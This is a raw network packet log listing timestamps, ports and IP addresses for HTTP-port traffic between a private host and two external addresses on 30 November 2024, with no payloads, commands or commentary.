Nov 30, 2024 04:06:54.053431988 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.054282904 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.054344893 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.054403067 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.055422068 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.055479050 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.056504965 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.056564093 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.056960106 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.057610989 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.057662964 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.057672977 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.058744907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.058789968 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.058826923 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.059845924 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.059899092 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.059900999 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.060950041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.061037064 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.061069012 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.062071085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.062118053 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.062156916 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.063179970 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.063221931 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.063232899 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.065021992 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.065069914 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.065135002 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.065397978 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.065440893 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.065495014 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.066503048 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.066593885 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.066615105 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.067625046 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.067744017 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.067749023 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.068730116 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.068780899 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.068815947 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.069859028 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.069909096 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.069945097 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.070957899 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.071002960 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.071089029 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.072067976 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.072113991 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.072170019 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.073178053 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.073276997 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.073544979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.073590994 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.074132919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.074258089 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.074321032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.074413061 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.074733973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.074759007 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.074927092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.075093031 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.075413942 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.075520992 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.075582027 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.075634003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.076033115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.076118946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.076137066 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.076221943 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.076487064 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.076536894 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.076596022 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.077142954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.077191114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.077222109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.077265978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.077594042 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.077632904 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.077702045 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.078229904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.078275919 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.078336000 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.078380108 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.078711987 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.078777075 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.078814030 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.079287052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.079385042 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.079396963 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.079441071 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.079833031 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.079881907 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.079917908 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.080379009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.080425024 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.080473900 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.080519915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.080935955 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.080981016 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.081002951 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.081480026 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.081526041 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.081599951 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.081643105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.082568884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.082681894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.083007097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.083664894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.083827972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.084736109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.084847927 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.085753918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.085823059 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.085916996 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.086899996 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.087006092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.087774992 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.088013887 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.088208914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.089088917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.089215040 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.090229034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.090363026 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.091248989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.091365099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.091480017 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.091574907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.092339039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.092458010 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.092941046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.093446016 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.093493938 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.093570948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.093616962 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.094532967 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.094580889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.094619036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.094665051 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.095637083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.095683098 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.095731974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.095817089 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.096709967 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.096760035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.096815109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.096863985 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.097779036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.097847939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.097878933 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.097930908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.098866940 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.098927975 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.098975897 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.099036932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.099956989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.100008965 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.100065947 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.100116014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.101193905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.101244926 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.101290941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.101341009 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.102133989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.102237940 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.102379084 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.102497101 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.103209972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.103264093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.103324890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.103379011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.104317904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.104370117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.104445934 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.104497910 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.105401993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.105447054 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.105521917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.105557919 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.106483936 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.106565952 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.106592894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.106647015 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.107563972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.107616901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.107692957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.107744932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.108658075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.108714104 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.108777046 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.108828068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.109738111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.109848976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.109986067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.110825062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.110881090 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.110938072 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.110991001 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.111916065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.111964941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.112016916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.112066031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.113012075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.113065004 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.113095045 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.113147020 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.114088058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.114137888 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.114171982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.114221096 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.115168095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.115215063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.115277052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.115330935 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.116269112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.116318941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.116377115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.116430998 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.117413044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.117464066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.117528915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.117579937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.118419886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.118474960 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.118510008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.118557930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.119544029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.119594097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.119672060 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.119723082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.120609045 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.120662928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.120690107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.120743036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.121963024 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.121998072 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.122081995 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.122159958 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.122848988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.122958899 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.122970104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.123055935 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.123507023 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.123882055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.123943090 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.124002934 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.124056101 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.124978065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.125027895 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.125118017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.125169039 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.126086950 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.126137018 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.126192093 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.126243114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.127140999 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.127193928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.127249956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.127300978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.128211975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.128253937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.128318071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.128365040 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.129297018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.129345894 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.129407883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.129483938 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.130352020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.130402088 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.201795101 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.201905012 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.201960087 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.202363014 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.202440023 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.202492952 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.203471899 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.203608036 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.203656912 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.204561949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.227518082 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.227562904 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.227622032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.227874041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.227919102 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.227998972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.228955984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.228996992 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.229060888 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.230063915 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.230103016 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.230155945 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.231169939 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.231208086 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.231224060 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.232275963 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.232322931 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.232394934 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.233392954 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.233432055 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.233485937 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.234494925 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.234551907 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.234590054 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.235625029 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.235671043 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.235706091 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.236733913 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.236778975 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.236814976 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.237843037 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.237894058 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.237932920 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.238934994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.238981962 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.239044905 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.240077972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.240120888 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.240190029 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.241173029 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.241219997 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.241234064 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.242260933 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.242302895 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.242367983 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.243386030 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.243432999 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.243515968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.244498014 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.244544983 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.244606018 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.245613098 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.245657921 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.245716095 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.246716976 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.246758938 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.246772051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.247859955 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.247904062 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.247934103 CET	80	49894	185.215.113.16	192.168.2.4
